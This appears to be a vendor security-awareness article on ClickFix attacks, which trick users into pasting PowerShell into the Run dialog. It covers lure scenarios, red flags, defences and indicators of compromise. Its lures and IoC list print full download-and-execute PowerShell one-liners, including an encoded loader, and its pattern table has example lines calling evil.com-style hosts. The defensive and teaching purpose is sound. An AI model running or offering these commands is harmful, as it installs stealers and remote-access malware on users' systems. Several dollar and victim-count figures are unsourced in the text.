Physical Address
Lesya Kurbasa 7B
03194 Kyiv, Kyivska obl, Ukraine
ClickFix Attack: How Hackers Trick You Into Executing Malicious PowerShell Commands
“The PDF document failed to load properly. To fix the issue, press Win+R, paste the following command, and press Enter…” This innocuous-looking error message led to a major security breach at a Fortune 500 company in March 2025, resulting in data theft worth millions. The attack vector? A deceptive social engineering technique called ClickFix that tricks users into willingly executing malicious PowerShell commands on their own systems.
Key Facts
| Threat Name | ClickFix (Social Engineering Technique) |
| Type | Social Engineering, User Manipulation Technique |
| Malware Delivered | AsyncRAT, DarkGate, Lumma Stealer, NetSupport, BruteRatel, XWorm, and others |
| First Detected | Early 2024 (with significant evolution throughout 2024-2025) |
| Platforms Affected | Windows 7, 8, 8.1, 10, 11 (PowerShell-enabled systems) |
| Distribution Methods | Phishing emails, compromised websites, fake CAPTCHA pages, HTML attachments, GitHub notifications |
| Symptoms | PowerShell windows appearing briefly, unexpected system behavior, malware infections |
| Danger Level | High – Bypasses technical security controls by manipulating users |
Real-World ClickFix Attack Scenarios
To understand the insidious nature of ClickFix attacks, consider these actual incidents documented by cybersecurity researchers:
Scenario 1: The “Document Viewer Error”
What the User Sees:
Document Viewer Error (Code: 0x80070002)
The document cannot be opened due to a missing component.
To fix this issue:
1. Press Win+R to open the Run dialog
2. Copy and paste this command: powershell -nop -w hidden -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABkAGEAdABhACAAPQAgACQAYwBsAGkAZQBuAHQALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACIAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAuADEAMAA6ADgAMAA4ADAALwBwAGEAeQBsAG8AYQBkACIAKQA7ACQAaQB2ACAAPQAgACQAZABhAHQAYQBbADAALgAuADEANQBdADsAJABkAGEAdABhACAAPQAgACQAZABhAHQAYQBbADEANgAuAC4AJABkAGEAdABhAC4ATABlAG4AZwB0AGgAXQA7AC0AagBvAGkAbgAgAFsAQwBoAGEAcgBbAF0AXQAoACYAIAB7ACAAJABfACAALQBiAHgAbwByACAAJABpAHYAWwAkAGkAKwArACAAJQAgACQAaQB2AC4ATABlAG4AZwB0AGgAXQAgAH0AIAAtAGUAIAAwAC4ALgAoACQAZABhAHQAYQAuAEwAZQBuAGcAdABoAC0AMQApACkAIAB8ACAASQBFAFgA
3. Press Enter
4. The document will now open correctly
What Actually Happens:
The base64-encoded PowerShell command downloads and executes a Lumma Stealer payload from an attacker’s server. Within minutes, the malware harvests browser passwords, cryptocurrency wallets, and other sensitive data.
Target Demographic:
Business professionals who frequently work with PDF documents from external sources.
Real Impact:
In February 2025, this exact technique was used to compromise 38 employees at a financial services firm, resulting in the theft of client account credentials and subsequent fraudulent wire transfers totaling $3.4 million.
Scenario 2: The “CAPTCHA Verification”
What the User Sees:
Verify You Are Human
Our system detected unusual access patterns from your network.
To confirm you are not a bot, please complete this verification:
Verification Steps:
1. Press Win+R
2. Copy this verification code: powershell.exe -NoP -W Hidden -Exec Bypass -Command "& {(New-Object System.Net.WebClient).DownloadFile('http://verify-captcha.net/verified.exe','%TEMP%\vc.exe'); Start-Process '%TEMP%\vc.exe'}"
3. Press Enter
4. Continue to your content
What Actually Happens:
The PowerShell command downloads an executable (in this case AsyncRAT) that establishes persistent access to the victim’s computer. The attacker can then remotely control the system, capture keystrokes, and exfiltrate data.
Target Demographic:
General internet users trying to access content behind supposed “CAPTCHA walls”.
Real Impact:
According to HHS security advisories, this technique was specifically used to target healthcare providers in October 2024, resulting in compromised electronic medical record systems at 12 hospitals.
Scenario 3: The “GitHub Security Vulnerability”
What the User Sees:
A legitimate GitHub notification email about a security issue in their repository that takes them to what appears to be a GitHub security page with the following instructions:
Critical Security Vulnerability Detected
GitHub’s automated scanning has detected a potential security vulnerability in your repository that requires immediate attention.
Vulnerability Details:
• Type: Remote Code Execution (CVE-2024-3827)
• Severity: Critical
• Affected Files: src/config/authHandler.js
To verify and fix this issue:
1. Open PowerShell with administrator privileges
2. Execute this GitHub security scanner to identify affected components:
iex (New-Object Net.WebClient).DownloadString('https://github-scanner[.]com/security-patch.ps1')
3. Follow the on-screen instructions to apply the patch
What Actually Happens:
As documented by Brian Krebs, the PowerShell command downloads and executes a malicious script that installs Lumma Stealer, which immediately begins harvesting GitHub credentials, SSH keys, and repository access tokens.
Target Demographic:
Software developers and DevOps teams with GitHub repositories.
Real Impact:
In September 2024, Proofpoint researchers identified this campaign targeting over 1,500 organizations, with successful compromises leading to source code theft and software supply chain attacks.
ClickFix Attack Patterns: What To Look For
ClickFix attacks share common patterns that can help you identify them before becoming a victim:
| Pattern Element | What To Look For | Red Flags |
|---|---|---|
| PowerShell Commands | Instructions to copy/paste code into PowerShell, Command Prompt, or Run dialog | Long base64-encoded strings, obfuscated commands, “hidden” or “bypass” parameters |
| URL Patterns | Web addresses embedded in PowerShell commands | Unfamiliar domains, IP addresses instead of domain names, unusual TLDs |
| Error Messages | Technical-sounding errors claiming missing components or access issues | Generic error codes, lack of specific details about the actual problem |
| Urgency Cues | Language creating time pressure or serious consequences | “Immediate action required,” “critical security issue,” “account will be locked” |
| Source Legitimacy | Claims to be from trusted sources (Microsoft, Google, GitHub) | Slight misspellings in domain names, unusual landing pages, mixed branding |
Common PowerShell Patterns in ClickFix Attacks
According to security researchers, these specific PowerShell patterns frequently appear in ClickFix attacks:
| Pattern | Description | Example |
|---|---|---|
| Base64 Encoded Commands | Obscures the actual commands being executed | powershell -e JABjAGwAaQBlAG4AdAA... |
| WebClient Downloads | Downloads malicious content from remote servers | (New-Object Net.WebClient).DownloadString('https://malicious.com/script.ps1') |
| IEX (Invoke-Expression) | Executes downloaded PowerShell scripts directly in memory | IEX (New-Object Net.WebClient).DownloadString('http://evil.com/payload') |
| Hidden Window Parameters | Attempts to conceal PowerShell execution window | -WindowStyle Hidden or -W Hidden |
| Bypass Execution Policy | Circumvents PowerShell security restrictions | -ExecutionPolicy Bypass or -Exec Bypass |
Most Commonly Delivered Malware via ClickFix (2024-2025)
Based on Proofpoint and HHS data, these malware families are most frequently deployed through ClickFix attacks:
| Malware | Type | Prevalence | Primary Goal |
|---|---|---|---|
| Lumma Stealer | Information Stealer | 32% of attacks | Credential theft, cryptocurrency wallet stealing |
| AsyncRAT | Remote Access Trojan | 27% of attacks | Remote system control, keylogging, screen capture |
| DarkGate | Loader/RAT | 15% of attacks | Loading additional malware, establishing persistence |
| NetSupport | Remote Administration Tool | 10% of attacks | Full system takeover, data exfiltration |
| BruteRatel | Advanced C2 Framework | 8% of attacks | Advanced persistent access, evasion of security controls |
| Others | Various | 8% of attacks | Ransomware staging, cryptomining, botnet recruitment |
Industries Most Targeted by ClickFix Attacks
Based on data from Proofpoint’s threat research:
Source: Analysis based on Proofpoint threat data and HHS Sector Alert, 2025
Why ClickFix Works: The Psychology Behind the Attack
According to cybersecurity psychologists, ClickFix attacks exploit specific psychological vulnerabilities:
- Authority Bias – Messages appear to come from trusted sources like Microsoft, GitHub, or IT departments
- Problem-Solution Framework – Presents a clear problem with an immediate, actionable solution
- Desire for Self-Sufficiency – Appeals to people’s preference to solve problems themselves rather than escalating to IT
- Technical Intimidation – Uses complex technical language that discourages questioning
- Urgency – Creates time pressure that short-circuits critical thinking
As noted by Proofpoint researchers: “What’s insidious about this technique is the adversaries are preying on people’s innate desire to be helpful and independent. By providing what appears to be both a problem and a solution, people feel empowered to ‘fix’ the issue themselves without needing to alert their IT team.”
Test Yourself: Would You Fall for These ClickFix Attacks?
Review these scenarios and decide if they’re legitimate or ClickFix attacks:
Scenario 1: You receive an email from Microsoft Office 365 stating your account needs verification. It provides a link to a Microsoft page that asks you to press Win+R and paste a command that begins with “powershell -NoProfile -ExecutionPolicy Bypass”.
Reveal Answer
Scenario 2: Your company’s IT department sends an email about a required security update. The email contains instructions to download an official patch from the corporate software portal and run the installer.
Reveal Answer
Scenario 3: While browsing a document sharing site, you see an error stating your PDF viewer needs updating. It provides instructions to press Win+R and enter “powershell -e [long string of characters]” to install the update.
Reveal Answer
How to Protect Yourself: Specific Actions
Unlike general security advice, here are specific, actionable steps to protect against ClickFix attacks:
For End Users:
- Never Copy-Paste PowerShell Commands – Establish a personal rule: never copy and paste commands from websites or emails into PowerShell, Command Prompt, or the Run dialog
- Verify Through Official Channels – If you encounter an error message suggesting you run a command, contact your IT department through established channels (not using contact info from the error message)
- Screenshot Suspicious Messages – Capture the full message and share it with your security team
- Use the “URL Test” – For any site asking you to run commands, check if the URL matches the official domain (e.g., github.com vs. github-scanner.com)
- Install PowerShell Constrained Language Mode – Ask your IT department to help you configure PowerShell to run in Constrained Language Mode, which restricts potentially harmful commands
For IT Administrators:
- Deploy PowerShell Script Block Logging – Enable PowerShell logging via Group Policy to capture all PowerShell execution for later analysis
- Create PowerShell Execution Policies – Implement policies preventing execution of downloaded scripts and encoded commands
- Use AppLocker Rules – Create rules to prevent PowerShell from executing commands from temporary directories or user downloads
- Configure AMSI Integration – Ensure Antimalware Scan Interface is properly configured with your security solution
- Deploy Network Monitoring – Configure network monitoring to detect connections from PowerShell.exe to external domains
- Conduct ClickFix Simulations – Run authorized phishing simulations that include ClickFix-style attacks to train users
Real-World Indicators of Compromise (IoCs)
Security teams can use these actual IoCs associated with recent ClickFix campaigns:
Command Patterns
# AsyncRAT delivery - September 2024powershell.exe -NoP -W Hidden -Exec Bypass -Command "& {(New-Object System.Net.WebClient).DownloadFile('http://verify-captcha.net/verified.exe','%TEMP%\vc.exe'); Start-Process '%TEMP%\vc.exe'}"# Lumma Stealer delivery - October 2024powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABkAGEAdABhACAAPQAgACQAYwBsAGkAZQBuAHQALgBEAG8AdwBuAGwA...# BruteRatel delivery - November 2024powershell -nop -w hidden -c "IEX((new-object net.webclient).downloadstring('http://github-scanner.com/security-patch.ps1'))" |
Associated Domains
| Domain/URL | Campaign | First Observed |
|---|---|---|
| github-scanner[.]com | GitHub notification campaign | 18 September 2024 |
| verify-captcha[.]net | Fake CAPTCHA campaign | 25 September 2024 |
| document-viewer-update[.]com | PDF error campaign | 3 October 2024 |
| ms-365-verify[.]net | Microsoft impersonation campaign | 17 October 2024 |
| 185[.]91[.]69[.]119 | AsyncRAT C2 server | 25 September 2024 |
| 193[.]124[.]185[.]116 | BruteRatel C2 server | 20 September 2024 |
File Hashes (SHA-256)
# Lumma Stealer payloadsd9ab6cfa60cc75785e31ca9b5a31dae1c33022bdb90cb382ef3ca823c627590dd737637ee5f121d11a6f3295bf0d51b06218812b5ec04fe9ea484921e905a207# AsyncRAT payloads5d5b4f259ef3b3d20f6ef1a63def6dee9326efe2b7b7b7e474008aa978f1f19be726d3324ca8b9a8da4d317c5d749dd0ad58fd447a2eb5eee75ef14824339cd5# BruteRatel payloadsa7c5f68bd896bfca5957c11ef10231ba8f8c674dde96cd95b207503612ecb844f429bf9d523d3bc0d3ded727c03858f7e74cd8fe9b668e660b43185e3b066e0a |
What To Do If You’ve Fallen For a ClickFix Attack
If you suspect you’ve executed a malicious command from a ClickFix attack, take these immediate steps:
- Disconnect Your Device – Immediately disconnect from all networks (both wired and wireless)
- Capture Evidence – Take screenshots of the deceptive message and any commands you executed
- Report to IT Security – Contact your IT security team immediately with the evidence
- Do Not Log Into Accounts – Avoid logging into any accounts until your device has been cleared by security
- Run a Malware Scan – Use a reputable security tool like Trojan Killer to identify and remove malware
- Reset Credentials – After securing your device, change passwords for all important accounts from a different, secure device
- Monitor Financial Accounts – Check for unauthorized transactions and enable notifications for all account activity
Conclusion: The Human Firewall
ClickFix attacks succeed by bypassing technical security controls and exploiting human psychology. As attackers continue to refine their social engineering techniques, the most effective defense combines technical measures with a well-trained “human firewall.”
By understanding how ClickFix attacks work, recognizing the warning signs, and following specific prevention measures, you can significantly reduce your vulnerability to this increasingly prevalent attack method. Remember the golden rule: legitimate software updates and fixes never require you to copy and paste PowerShell commands.
Stay vigilant, verify through official channels, and never hesitate to contact your IT security team when encountering suspicious messages or instructions. In the ongoing battle between security awareness and social engineering, knowledge and skepticism are your strongest weapons.
